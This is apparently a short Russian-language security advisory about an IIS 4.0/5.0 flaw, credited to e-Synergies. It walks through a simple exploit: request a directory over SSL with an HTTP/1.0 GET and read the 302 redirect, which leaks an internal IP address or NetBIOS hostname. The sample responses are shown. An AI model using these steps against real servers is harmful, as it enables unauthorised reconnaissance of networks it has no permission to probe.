Раскрытие внутреннего IP в IIS 4.0,5.0

e-Synergies обнаружили и исследовали уязвимость в Internet Information Server. Успешная эксплуатация этой уязвимости может показать критическую внутреннюю информацию типа внутреннего IP адреса или внутреннего имени хоста, соединяясь вручную с TCP/443 портом (SSL) ( например используя Perl (SSLeay)).

Эксплоит:

1-Просматриваем интернет сайт, используя SSL броузер и находим любой каталог.

К примеру: https: // www.target.com/images/icon.gif

2-Используем совместимый SSL Perl сценарий, выполните следующую команду:

GET /images HTTP/1.0 (ели не получится попробуйте HTTP/1.1)

3- Результат должен выглядеть следующим образом:



HTTP/1.1 302 Object Moved

Location: https://192.168.1.10/images/

Server: Microsoft-IIS/4.0

Content-Type: text/html

Content-Length: xxx

Или

HTTP/1.1 302 Object Moved

Location: https://netbiosname/images/

Server: Microsoft-IIS/4.0

Content-Type: text/html

Content-Length: xxx